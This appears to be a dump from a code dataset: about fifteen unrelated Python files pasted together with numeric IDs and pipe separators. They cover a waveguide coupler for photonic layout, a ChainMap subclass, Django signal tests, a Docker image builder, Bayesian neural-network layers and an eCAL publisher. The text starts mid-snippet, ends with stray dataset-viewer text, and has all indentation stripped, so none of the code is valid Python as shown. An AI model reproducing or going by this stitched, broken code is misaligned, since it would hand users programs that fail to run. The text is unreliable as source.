c = c+1
for i in range(abs(n-m)):
if r1[len(r2)+i] not in r2:
c=c+1
print(c)
|
1621062
|
from typing import List, Tuple
import pp
from pp.component import Component
@pp.autoname
def coupler_straight(
length: float = 10.0,
width: float = 0.5,
gap: float = 0.27,
layer: Tuple[int, int] = pp.LAYER.WG,
layers_cladding: List[Tuple[int, int]] = [pp.LAYER.WGCLAD],
cladding_offset: float = 3.0,
) -> Component:
""" straight coupled waveguides. Two multimode ports
.. plot::
:include-source:
import pp
c = pp.c.coupler_straight()
pp.plotgds(c)
"""
c = Component()
# Top path
c.add_polygon([(0, 0), (length, 0), (length, width), (0, width)], layer=layer)
y = width + gap
# Bottom path
c.add_polygon(
[(0, y), (length, y), (length, width + y), (0, width + y)], layer=layer
)
# One multimode port on each side
port_w = width * 2 + gap
c.add_port(name="W0", midpoint=[0, port_w / 2], width=port_w, orientation=180)
c.add_port(name="E0", midpoint=[length, port_w / 2], width=port_w, orientation=0)
c.width = width
c.length = length
# cladding
ymax = 2 * width + gap + cladding_offset
for layer_cladding in layers_cladding:
c.add_polygon(
[
(0, -cladding_offset),
(length, -cladding_offset),
(length, ymax),
(0, ymax),
],
layer=layer_cladding,
)
return c
@pp.autoname
def coupler_straight_biased(length=10, width=0.5, gap=0.27, layer=pp.LAYER.WG):
return coupler_straight(
width=pp.bias.width(width), gap=pp.bias.gap(gap), length=length, layer=layer
)
def _demo():
c = coupler_straight(gap=0.2)
pp.write_gds(c)
return c
if __name__ == "__main__":
# c = _demo()
c = coupler_straight_biased(width=0.5, gap=0.2)
pp.show(c)
|
1621073
|
from collections import ChainMap
class ScopedChainMap(ChainMap):
def getlevel(self, k, default_value=None, default_level=None):
"Look up a key and the level where it's stored, returning defaults if it doesn't exist"
for i, mapping in enumerate(self.maps):
try:
return mapping[k], i
except KeyError:
pass
return default_value, default_level
def set(self, k, v, non_local=True):
"Set `k` to `v`, at the scope level where `k` is already defined if `non_local`"
if non_local:
for mapping in self.maps:
if k in mapping:
mapping[k] = v
return
self.maps[0][k] = v
def setlevel(self, k, v, level=0):
"Set `k` to `v` at `level`"
self.maps[level][k] = v
|
1621074
|
def print_full_name(a, b):
print("Hello %s %s! You just delved into python." % (a, b))
return
if __name__ == '__main__':
first_name = raw_input()
last_name = raw_input()
print_full_name(first_name, last_name)
|
1621081
|
from django.template.loader import render_to_string
from wagtail.core import blocks
class BaseStaticBlock(blocks.StaticBlock):
"""
This is used instead of blocks.StaticBlock to control markup in admin and apply styling
"""
def render_form(self, value, prefix='', errors=None):
return render_to_string('wagtail_advanced_form_builder/admin/blocks/base_static_block.html', {
'name': self.name,
'text': self.meta.help_text,
'classes': self.meta.form_classname,
})
|
1621095
|
import unittest
from vdebug.opts import Options,OptionsError
class OptionsTest(unittest.TestCase):
def tearDown(self):
Options.instance = None
def test_has_instance(self):
Options.set({1:"hello", 2:"world"})
self.assertIsInstance(Options.inst(), Options)
def test_get_option(self):
Options.set({'foo':"hello",'bar':"world"})
self.assertEqual("hello", Options.get('foo'))
def test_get_option_for_print(self):
Options.set({'foo':"", 'bar':"world"})
self.assertEqual("<empty>", Options.get_for_print('foo'))
self.assertEqual("world", Options.get_for_print('bar'))
def test_get_option_as_type(self):
Options.set({'foo':"1", 'bar':"2"})
opt = Options.get('foo', int)
self.assertIsInstance(opt, int)
self.assertEqual(1, opt)
def test_overwrite(self):
Options.set({'foo':"hello", 'bar':"world"})
Options.overwrite('foo', "hi")
self.assertEqual("hi", Options.get('foo'))
def test_option_is_not_set(self):
Options.set({'foo':"", 'bar':"2"})
self.assertFalse(Options.isset("monkey"))
def test_option_is_not_valid(self):
Options.set({'foo':"", 'bar':"2"})
self.assertFalse(Options.isset("foo"))
def test_option_isset(self):
Options.set({'foo':"", 'bar':"2"})
self.assertTrue(Options.isset("bar"))
def test_uninit_raises_error(self):
self.assertRaises(OptionsError, Options.isset,'something')
def test_get_raises_error(self):
Options.set({'foo':"1", 'bar':"2"})
self.assertRaises(OptionsError, Options.get,'something')
|
1621212
|
from __future__ import absolute_import
from django.db import models
from django.test import TestCase
from .models import Author, Book
signal_output = []
def pre_save_test(signal, sender, instance, **kwargs):
signal_output.append('pre_save signal, %s' % instance)
if kwargs.get('raw'):
signal_output.append('Is raw')
def post_save_test(signal, sender, instance, **kwargs):
signal_output.append('post_save signal, %s' % instance)
if 'created' in kwargs:
if kwargs['created']:
signal_output.append('Is created')
else:
signal_output.append('Is updated')
if kwargs.get('raw'):
signal_output.append('Is raw')
def pre_delete_test(signal, sender, instance, **kwargs):
signal_output.append('pre_save signal, %s' % instance)
signal_output.append('instance.id is not None: %s' % (instance.id != None))
def post_delete_test(signal, sender, instance, **kwargs):
signal_output.append('post_delete signal, %s' % instance)
signal_output.append('instance.id is not None: %s' % (instance.id != None))
class SignalsRegressTests(TestCase):
"""
Testing signals before/after saving and deleting.
"""
def get_signal_output(self, fn, *args, **kwargs):
# Flush any existing signal output
global signal_output
signal_output = []
fn(*args, **kwargs)
return signal_output
def setUp(self):
# Save up the number of connected signals so that we can check at the end
# that all the signals we register get properly unregistered (#9989)
self.pre_signals = (len(models.signals.pre_save.receivers),
len(models.signals.post_save.receivers),
len(models.signals.pre_delete.receivers),
len(models.signals.post_delete.receivers))
models.signals.pre_save.connect(pre_save_test)
models.signals.post_save.connect(post_save_test)
models.signals.pre_delete.connect(pre_delete_test)
models.signals.post_delete.connect(post_delete_test)
def tearDown(self):
models.signals.post_delete.disconnect(post_delete_test)
models.signals.pre_delete.disconnect(pre_delete_test)
models.signals.post_save.disconnect(post_save_test)
models.signals.pre_save.disconnect(pre_save_test)
# Check that all our signals got disconnected properly.
post_signals = (len(models.signals.pre_save.receivers),
len(models.signals.post_save.receivers),
len(models.signals.pre_delete.receivers),
len(models.signals.post_delete.receivers))
self.assertEqual(self.pre_signals, post_signals)
def test_model_signals(self):
""" Model saves should throw some signals. """
a1 = Author(name='<NAME>')
self.assertEqual(self.get_signal_output(a1.save), [
"pre_save signal, <NAME>",
"post_save signal, <NAME>",
"Is created"
])
b1 = Book(name='Snow Crash')
self.assertEqual(self.get_signal_output(b1.save), [
"pre_save signal, Snow Crash",
"post_save signal, Snow Crash",
"Is created"
])
def test_m2m_signals(self):
""" Assigning and removing to/from m2m shouldn't generate an m2m signal """
b1 = Book(name='Snow Crash')
self.get_signal_output(b1.save)
a1 = Author(name='<NAME>')
self.get_signal_output(a1.save)
self.assertEqual(self.get_signal_output(setattr, b1, 'authors', [a1]), [])
self.assertEqual(self.get_signal_output(setattr, b1, 'authors', []), [])
|
1621252
|
import json
import os
import shlex
import shutil
import subprocess
import tarfile
import glob
from pathlib import Path
from typing import List
import wget
from pesto.cli import PROCESSING_FACTORY_PATH
from pesto.cli.core.build_config import BuildConfig
from pesto.cli.core.config_loader import ConfigLoader
from pesto.cli.core.docker_builder import DockerBuilder
from pesto.cli.core.pesto_files import PestoFiles
from pesto.cli.core.utils import PESTO_LOG
from pesto.common.utils import load_json, validate_json, mkdir
def copy_requirement(from_uri: str, target_path: str) -> None:
mkdir(target_path)
if from_uri.startswith("gs://"):
PESTO_LOG.info('copy to : {}'.format(target_path))
subprocess.call(shlex.split('gsutil cp {0} {1}'.format(from_uri.rstrip(os.path.sep), target_path)))
elif from_uri.startswith("file://") and os.path.exists(from_uri.replace("file://", "")):
shutil.copyfile(from_uri.replace("file://", ""), target_path)
else:
wget.download(url=from_uri, out=target_path)
class Builder:
SCHEMA_PATH = os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli/resources/schema')
def __init__(self, build_config: BuildConfig):
PESTO_LOG.info('***** init packaging *****')
self.build_config = build_config
self.configs = ConfigLoader.load(build_config)
PESTO_LOG.info('********** build parameters **********')
PESTO_LOG.info('{}'.format(json.dumps(build_config.__dict__, indent=4)))
PESTO_LOG.info('processing factory path : {}'.format(PROCESSING_FACTORY_PATH))
def conf_validation(self) -> None:
PESTO_LOG.info('********** validate requirements.json **********')
requirements_schema = load_json(Builder.SCHEMA_PATH, 'requirements_schema.json')
validate_json(self.configs[PestoFiles.requirements], requirements_schema)
PESTO_LOG.info('********** validate config.json **********')
validate_json(self.configs[PestoFiles.config], self.configs[PestoFiles.config_schema])
def copy_factory_files(self) -> None:
PESTO_LOG.info('********** copy factory files **********')
if os.path.exists(self.workspace):
shutil.rmtree(self.workspace)
os.makedirs(self.workspace, exist_ok=True)
PESTO_LOG.info('workspace created : {}'.format(self.workspace))
# copy pesto required resources (api_geo_process_v1.0.yaml)
PESTO_LOG.debug('COPY pesto resources to workspace from: {}'.format(PROCESSING_FACTORY_PATH))
# shutil.copytree(os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli'), os.path.join(self.workspace, 'pesto/cli'))
os.makedirs(os.path.join(self.workspace, "pesto"), exist_ok=True)
shutil.copyfile(os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli/resources/doc/api_geo_process_v1.0.yaml'),
os.path.join(self.workspace, 'pesto/api_geo_process_v1.0.yaml'))
# copy algorithm
target_path = os.path.join(self.workspace, self.build_config.name)
PESTO_LOG.debug('COPY algorithm to workspace from: {} to: {}'.format(
self.build_config.algorithm_path,
target_path))
shutil.copytree(self.build_config.algorithm_path, target_path)
# copy/update config files
shutil.rmtree(os.path.join(target_path, 'pesto', 'api'))
shutil.rmtree(os.path.join(target_path, 'pesto', 'build'))
os.makedirs(os.path.join(target_path, 'pesto', 'api'))
os.makedirs(os.path.join(target_path, 'pesto', 'build'))
for item in self.configs:
with open(os.path.join(target_path, 'pesto', item.value), 'w') as _:
json.dump(self.configs[item], _, indent=4, sort_keys=True)
def copy_requirements(self) -> None:
PESTO_LOG.info('********** copy requirements **********')
requirements = self.configs[PestoFiles.requirements]['requirements']
for name in requirements.keys():
from_uri = requirements[name]['from']
temporary_path = os.path.join(self.workspace, 'requirements', os.path.basename(from_uri))
target_path = os.path.join(self.workspace, name)
PESTO_LOG.info('COPY from {} to {}'.format(from_uri, temporary_path))
copy_requirement(from_uri, temporary_path)
if from_uri.endswith('tar.gz'):
PESTO_LOG.info('EXTRACT from {} to {}'.format(temporary_path, target_path))
with tarfile.open(temporary_path, 'r:gz') as file:
file.extractall(path=target_path)
def copy_pesto_whl(self) -> None:
PESTO_LOG.info('********** copy local pesto wheel if any **********')
source_dir = os.path.join(Path.home(), ".pesto/dist")
dest_dir = os.path.join(self.workspace, 'dist/')
os.makedirs(dest_dir, exist_ok=True)
for filename in glob.glob(os.path.join(source_dir, '*.*')):
PESTO_LOG.info('********** copy {} in {} **********'.format(filename, dest_dir))
shutil.copy(filename, dest_dir)
def build_docker_image(self) -> None:
PESTO_LOG.info('********** build docker image **********')
DockerBuilder(self.configs[PestoFiles.requirements], self.build_config).build(self.workspace)
@property
def workspace(self):
return self.build_config.workspace
def build(build_config_path: str, profiles: List[str], proxy: str = None, network: str = "host") -> None:
config = BuildConfig.from_path(path=build_config_path, profiles=profiles, proxy=proxy, network=network)
builder = Builder(config)
builder.conf_validation()
builder.copy_factory_files()
builder.copy_requirements()
builder.copy_pesto_whl()
builder.build_docker_image()
|
1621255
|
import functools
import inspect
import six
import lasagne.layers.base
import pymc3 as pm
from pymc3.memoize import hashable
from gelato.specs.dist import get_default_spec, FlatSpec
from gelato.specs.base import DistSpec
__all__ = [
'LayerModelMeta',
'Layer',
'MergeLayer',
'bayes'
]
class LayerModelMeta(pm.model.InitContextMeta):
"""Magic comes here
"""
def __init__(cls, what, bases, dic):
from gelato.layers.helper import find_parent
super(LayerModelMeta, cls).__init__(what, bases, dic)
# make flexible property for new class
def fget(self):
if self._name is None:
return '{}_{}'.format(self.__class__.__name__, self._fingerprint)
else:
return self._name
def fset(self, value):
if not value:
self._name = None
else:
self._name = str(value)
cls._name = None
cls.name = property(fget, fset)
# wrap init for new class
def wrap_init(__init__):
@functools.wraps(__init__)
def wrapped(self, *args, **kwargs):
name = kwargs.get('name')
self._fingerprint = hashable(self.parent)
pm.Model.__init__(self, name)
__init__(self, *args, **kwargs)
return wrapped
# wrap new for new class
def wrap_new(__new__):
@functools.wraps(__new__)
def wrapped(_cls_, *args, **kwargs):
parent = kwargs.get('model', None)
if parent is None and not issubclass(_cls_, lasagne.layers.InputLayer):
incoming = kwargs.get('incoming',
kwargs.get('incomings',
args[1]))
parent = find_parent(incoming)
kwargs['model'] = parent
instance = __new__(_cls_, *args, **kwargs)
return instance
return classmethod(wrapped)
cls.__init__ = wrap_init(cls.__init__)
cls.__new__ = wrap_new(cls.__new__)
def add_param(self, spec, shape, name=None, **tags):
if tags.get('trainable', True):
if tags.get('regularizable', True):
if not isinstance(spec, DistSpec):
# here spec is like test value
# passed to pymc3 distribution
spec = getattr(self, 'default_spec', get_default_spec(spec))
else:
spec = FlatSpec()
if name is not None:
spec = spec.with_name(name)
return lasagne.layers.base.Layer.add_param(
self, spec, shape, **tags)
cls.add_param = add_param
# needed for working with lasagne tools
def wrap_getitem(__getitem__):
@functools.wraps(__getitem__)
def wrapped(self, item):
if not isinstance(item, six.string_types):
raise TypeError('%r object accepts only string keys'
% self.__class__)
else:
__getitem__(self, item)
return wrapped
cls.__getitem__ = wrap_getitem(cls.__getitem__)
def __repr__(self):
return '{}.{}'.format(self.__module__, self.__name__)
@classmethod
def __subclasshook__(cls, C):
if lasagne.layers.Layer in C.__mro__ or pm.Model in C.__mro__:
return True
else:
return False
def bayes(layercls, stack=1):
try:
issubcls = issubclass(layercls, lasagne.layers.base.Layer)
except TypeError:
raise TypeError('{} needs to be a Layer subclass'
.format(layercls))
if issubcls:
if type(layercls) is LayerModelMeta:
raise TypeError('{} is already bayesian'
.format(layercls))
else:
@six.add_metaclass(LayerModelMeta)
class BayesianAnalog(layercls, pm.Model):
pass
frm = inspect.stack()[stack]
mod = inspect.getmodule(frm[0])
if mod is None:
modname = '__main__'
else:
modname = mod.__name__
BayesianAnalog.__module__ = modname
BayesianAnalog.__doc__ = layercls.__doc__
BayesianAnalog.__name__ = layercls.__name__
return BayesianAnalog
else:
raise TypeError('{} needs to be a Layer subclass'
.format(layercls))
Layer = bayes(lasagne.layers.base.Layer)
MergeLayer = bayes(lasagne.layers.base.MergeLayer)
|
1621256
|
import os
from BERT_DATA import CombineBertData
split = "train"
files = "/scratch365/yding4/bert_project/bert_prep_working_dir/" \
"hdf5_lower_case_1_seq_len_128_max_pred_20_masked_lm_prob_0.15_random_seed_12345_dupe_factor_5/wikicorpus_en"
path = files
if not os.path.exists(path):
raise FileNotFoundError(
"Dataset not found: ({})".format(path)
)
files = [os.path.join(path, f) for f in os.listdir(path)] if os.path.isdir(path) else [path]
print(files)
files = [f for f in files if split in f]
print(files)
assert len(files) > 0
self.datasets[split] = CombineBertData(files)
|
1621257
|
import numpy as np
from scipy.sparse import coo_matrix
from scipy.sparse.linalg import norm
def prepare_input(y, X, end_time):
y0, y1 = y[np.isnan(y[:, 1])], y[~np.isnan(y[:, 1])]
x0, x1 = X[np.isnan(y[:, 1])], X[~np.isnan(y[:, 1])]
diagonal0, diagonal1 = coo_matrix((y0.shape[0], y0.shape[0])), coo_matrix((y1.shape[0], y1.shape[0]))
diagonal0.setdiag(np.ones(y0.shape[0]))
diagonal1.setdiag(np.ones(y1.shape[0]))
mu = get_regularization_parameter(X)
return {'y0': y0, 'y1': y1, 'x0': x0, 'x1': x1, 'end_time': end_time, 'mu': mu,
'diagonal0': diagonal0, 'diagonal1': diagonal1}
def get_regularization_parameter(X):
n = X.shape[0]
return norm(X) ** 2 / n
def hash_all(x, mod):
x_ = np.zeros(mod)
for i in x:
x_[hash(i) % mod] += 1
return x_
def check_input_data(y):
assert (y[:, 0] >= 0.).all()
assert (y[~np.isnan(y[:, 1])][:, 0] <= y[~np.isnan(y[:, 1])][:, 1]).all()
class MultiEncoder:
def __init__(self, encoders):
"""
:param encoders: iterable of encoders with the property:
encoders[i].features is a subset of encoders[i+1].features
"""
self.encoders = encoders
self.dimension = len(encoders)
def dict_vectorizer(self, state):
num_common_feat = len(set(self.encoders[-1].features).intersection(state))
best_level, best_encoder = self.dimension, self.encoders[-1]
for level, encoder in reversed(list(enumerate(self.encoders))):
partial_features = set(encoder.features)
num_common_feat_level = len(partial_features.intersection(state))
if num_common_feat_level < num_common_feat:
break
else:
best_level, best_encoder = level, encoder
return best_level, best_encoder.dict_vectorizer(state)
class MultiEstimator:
def __init__(self, estimators):
self.estimators = estimators
def predict(self, x_):
level, x = x_
estimator = self.estimators[level]
return estimator.predict(x)
|
1621293
|
import sys
import time
import ecal.core.core as ecal_core
from ecal.core.publisher import StringPublisher
if __name__ == "__main__":
# initialize eCAL API. The name of our Process will be "Python Hello World Publisher"
ecal_core.initialize(sys.argv, "Python Hello World Publisher")
# Create a String Publisher that publishes on the topic "hello_world_python_topic"
pub = StringPublisher("hello_world_python_topic")
# Create a counter, so something changes in our message
counter = 0
# Infinite loop (using ecal_core.ok() will enable us to gracefully shutdown
# the process from another application)
while ecal_core.ok():
# Create a message with a counter an publish it to the topic
current_message = "Hello World {:6d}".format(counter)
print("Sending: {}".format(current_message))
pub.send(current_message)
# Sleep 500 ms
time.sleep(0.5)
counter = counter + 1
# finalize eCAL API
ecal_core.finalize()
|
1621302
|
import unittest
import commands
import models
class TestGold(unittest.TestCase):
def test_number_gold_credit(self):
self.assertEqual(12, commands.reddit_gold.number_gold_credit())
commands.reddit_gold.store_user_buy(models.User('just-an-dev'), 1, None)
self.assertEqual(11, commands.reddit_gold.number_gold_credit())
commands.reddit_gold.store_user_buy(models.User('just-an-dev'), 7, None)
self.assertEqual(4, commands.reddit_gold.number_gold_credit())
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.